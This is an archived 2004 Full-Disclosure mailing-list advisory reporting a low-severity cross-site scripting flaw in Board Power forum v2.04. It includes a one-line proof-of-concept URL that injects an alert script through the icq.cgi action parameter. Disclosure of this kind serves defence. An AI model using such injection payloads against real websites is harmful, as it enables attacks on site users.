[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] XSS in Board Power forum

To: <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: [Full-Disclosure] XSS in Board Power forum
From: "Alexander Antipov" <antipov@xxxxxxxxxxxxxx>
Date: Thu, 15 Jul 2004 09:45:45 +0400

Programm: Board Power forum v2.04 PF
Autor: Ivan Zhdanov
CRITICAL: Low
Exploit: 
http://target/cgi-bin/boardpower/icq.cgi?action=<script>javascript:alert
('hello');</script>
URL: http://www.thewebmasterforums.com 
......
Maxpatrol - Professional Network Security Scanner (www.maxpatrol.com).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] RE: Unchecked buffer in mstask.dll
Next by Date: Re: [Full-Disclosure] Mystery phone lines, something is hiding and answering.
Previous by thread: [Full-Disclosure] RE: RE: HijackClick 3
Next by thread: [Full-Disclosure] [ GLSA 200407-13 ] PHP: Multiple security vulnerabilities
Index(es):
- Date
- Thread